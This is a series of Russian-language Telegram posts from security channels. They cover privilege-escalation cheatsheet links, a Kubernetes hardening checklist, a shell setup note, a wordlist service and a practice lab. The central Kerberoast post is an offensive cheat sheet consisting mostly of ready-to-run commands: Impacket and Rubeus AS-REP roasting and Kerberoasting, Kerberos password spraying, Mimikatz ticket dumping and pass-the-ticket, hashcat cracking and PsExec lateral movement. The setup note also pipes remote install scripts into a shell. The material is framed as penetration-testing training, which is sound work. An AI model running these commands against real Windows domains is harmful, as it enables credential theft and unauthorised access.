⌨️ Ключи от королевства: как заполучить всю власть в Linux, Windows и macOS
#windows #linux #macos #LPE #privesc

Я думаю многие из нас слышали про GTFOBins — cheatsheet по повышению привилегий в Linux. Но что же делать, если вы попали на Windows или MacOS?

💻 Для Windows

1. LOLBAS — аналог GTFOBins только для Windows
2. LOLDrivers — cheatsheet по уязвимым драйверам Windows

🍏 Для MacOS

1. LOOBins — тут собрано множество тем, таких как разведка, закрепление, повышение привилегий, обход средств защиты и т.д.

💻Для Linux

1. GTFOArgs — тот случай, когда даже GTFOBins не хватает, то вы всё ещё можете попробовать сделать PrivEsc через аргументы к различными командам.

📌 Также от себя добавлю интересный сборник команд, который поможет вам быстро вспомнить как пентестить AD — WADComs и ARTToolkit. А тут ещё пригодится AD Pentest MindMap из моего сборника ресурсов в закрепе.
ㅤ
🌚 @poxek

Kerberoast. Когда крадешь билеты на концерт, но не знаешь, как их использовать.
#Windows

Kerberoast - это метод атаки, который используется для получения хешей паролей пользователей в Windows домене, которые будет возможно сбрутить в оффлайн режиме.

➡️ Инструменты:
Rubeus
Kerbrute
Impacket
PsExec

➡️ ASREP-Roast

➡️ Impacket
Проверка ASREP для всех пользователей домена (Требуются валидные данные учетной записи)

python2 GetNPUsers.py <Domain>/<User>:<Password> -request -dc-ip <IP> -format <John|Hashcat> | grep "$krb5asrep$"

ㅤ
Проверка ASREP по списку пользователей домена (не требует доменных учетных данных)

python2 GetNPUsers.py <Domain> -usersfile <UserList>  -dc-ip <IP> -format <John|Hashcat> | grep "$krb5asrep$"

ㅤ
➡️ Rubeus
Извлечение из всех учетных записей домена

.\Rubeus.exe asreproast
.\Rubeus.exe asreproast /format:hashcat /outfile:C:Hashes.txt

ㅤ
➡️ Cracking
Windows

hashcat64.exe -m 18200 c:Hashes.txt rockyou.txt

​
Linux
``bash
john --wordlist rockyou.txt Hashes.txt --format=krb5tgs
hashcat -m 18200 -a 3 Hashes.txt rockyou
``
ㅤ
➡️ Brute Force

➡️ Kerbrute

./kerbrute userenum <UserList> --dc <IP> --domain <Domain>

ㅤ
➡️ Rubeus
со списком пользователей

.\Rubeus.exe brute /users:<UserList> /passwords:<Wordlist> /domain:<Domain>

ㅤ
Kerberos-based Password Spraying

.\Rubeus.exe brute /passwords:<Wordlist>

ㅤ
➡️ Kerberoasting

➡️ Impacket

GetUserSPNs.py <Domain>/<User>:<Password> -dc-ip <IP> -request

ㅤ
➡️ Rubeus
Kerberoast всех пользователей домена

.\Rubeus kerberoast

ㅤ
Все пользователи в поздразделении OU

.\Rubeus.exe kerberoast /ou:OU=Service_Accounts,DC=Security,DC=local

ㅤ
Атака на конкретных пользователей

.\Rubeus.exe kerberoast /user:File_SVC

ㅤ
➡️ Pass-The-Ticket

➡️ Mimikatz
Сбор тикетов

sekurlsa::tickets /export

​
Инжект тикета

kerberos::ptt <.kirbi file>

​
Создать CMD с инжектированным тикетом

misc::cmd

ㅤ
➡️ Rubeus
Дамп тикетов

.\Rubeus.exe dump

​
Инжект тикета

.\Rubeus.exe ptt /ticket:<.kirbi file>

ㅤ
➡️ PsExec
Используется после инъекции тикетов через Rubeus или Mimikatz

.\PsExec.exe -accepteula \\<IP> cmd

ㅤ
🌚 @poxek

⛈ Собесы, ох уж эти собесы

Мы часто критикуем рекрутеров за их вопросы на собесах, но, раз критикуешь - значит предлагай.

Совместно с сервисом для рекомендации ИТ-спецов за бонус Рефни сделали чек-лист: вопросы и возможные ответы для интервью инфобезов.

Мне, как человеку, который прошёл путь от множества отказов, фейлов и факапов на собесах, до специалиста, который сам участвует в отборе кандидатов и собеседовании с ними, стало понятно, что я могу предложить.

❤️ Я предлагаю вам бесплатно воспользоваться нашим чек-листом по хантингу безопасников от безопасника. Забрать можно тута

📌 PDFэфочка будет полезна и тем специалистам, которые не знают какие вопросы им могут задать на собеседовании. Так что тоже залетайте ⌨️

🌚 @poxek

From forgetful for forgetful. ohmyzsh + p10k
#заметки

Установка ohmyzsh

sudo apt update; sudo apt install -y zsh zip unzip git curl wget; echo Y | sh -c "$(curl -fsSL https://raw.github.com/robbyrussell/oh-my-zsh/master/tools/install.sh)"; zsh

Уже в свеженьком ohmyzsh наводим суету

sudo git clone https://github.com/romkatv/powerlevel10k.git $ZSH_CUSTOM/themes/powerlevel10k; sudo git clone https://github.com/zsh-users/zsh-syntax-highlighting.git ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/zsh-syntax-highlighting; sudo git clone https://github.com/zsh-users/zsh-autosuggestions ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/zsh-autosuggestions; sed -i 's+robbyrussell+powerlevel10k/powerlevel10k+g' ~/.zshrc; sed -i 's+git+zsh-syntax-highlighting zsh-autosuggestions+g' ~/.zshrc; sleep 1; clear; chsh -s /bin/zsh; source ~/.zshrc

Пару полезностей

bat для Ubuntu/Debian
batcat для Kali Linux

sudo apt install -y bat duf fd-find ripgrep 

Добавляем Go, Python в PATH.

nano ~/.zshrc

Вставляйте в конец файла.

# For go bins
export PATH="$PATH:/usr/local/go/bin"
export PATH="$PATH:$HOME/go/bin"

# For py bins
export PATH="$PATH:/usr/local/bin/python"

Куда ж без Docker

Установка для Ubuntu/Debian

curl -fsSL https://get.docker.com | bash

Установка для Kali

echo 'deb [arch=amd64 signed-by=/etc/apt/keyrings/docker.gpg] https://download.docker.com/linux/debian bookworm stable' | sudo tee /etc/apt/sources.list.d/docker.list ; curl -fsSL https://download.docker.com/linux/debian/gpg | sudo gpg --dearmor -o /etc/apt/keyrings/docker.gpg; sudo apt update; sudo apt install -y docker-ce docker-ce-cli containerd.io; sudo usermod -aG docker $USER; clear; echo 'Log out to apply new settings!'

🌚 @poxek

☄️ Набор рекомендаций по безопасности развертывания Kubernetes.

Цель этого контрольного списка — систематизировать подход к безопасности кластера Kubernetes и обеспечить выполнение всех необходимых шагов для защиты кластера от потенциальных угроз.

Короче говоря, он предоставляет организациям отправную точку для оценки безопасности своего развертывания Kubernetes и внесения любых необходимых изменений для полной защиты.

Рекомендации списка разбиты по категориям:
➖ Аутентификация и авторизация
➖ Секреты
➖ Безопасность конфигурации кластера
➖ Аудит и регистрация
➖ Безопасная конфигурация ОС
➖ Сетевая безопасность
➖ Безопасная настройка рабочих нагрузок
➖ Безопасная сборка образа

Следуйте рекомендациям и вы предпримете наиболее важные шаги для усиления защиты сред Kubernetes 🫡

#devops #devsecops #kubernetes

@DevOpsKaz

🔑 Найди свой ключ к успеху: словари для брутфорса
#bruteforce #wordlists

Недавно наткнулся на сервис Weekpass, который вобрал в себя множество wordlist'ов под разные цели. Вы можете скачать список с паролями для брутфорса RDP, WiFi handshake'ов, SNMP, CISCO, а также что-то помощнее в виде All-In-One решений, который весят от 130 до 330 гб.
Скачивать вы можете, как напрямую, так и через torrent. Самый большой словарь All-in-One содержит 28.330.702.856 строк... Но я советую максимум использовать All-in-One-P, т.к. этот пароль содержит только принтабельные символы. А для взлома WiFi хендшейков можно использовать All-in-One-Wi-Fi, он содержит пароли длинной от 8 до 24 символов.

🌚 @poxek

⚡️ FVWA (Flask Vulnerable Web Application)
#лаба @SidneyJob

❤️Когда-то я уже рассказывал про это веб-приложение для оттачивания навыков веб-пентеста. Вчера сделал мини пул-апдейт и решил сделать лабораторию доступной для всех =)

Проходите!
⚡️ https://lab.szybnev.cc/
ㅤ

Докер автоматически рестартнется в случае чего. Но если не доступна, то пишите в ЛС - подниму.

📌Кто будет проходить, пишите время и скрин с результатами, за сколько прошли тот или иной таск или вообще всю лабу)
🐱
🐱
🐾

🌚 @poxek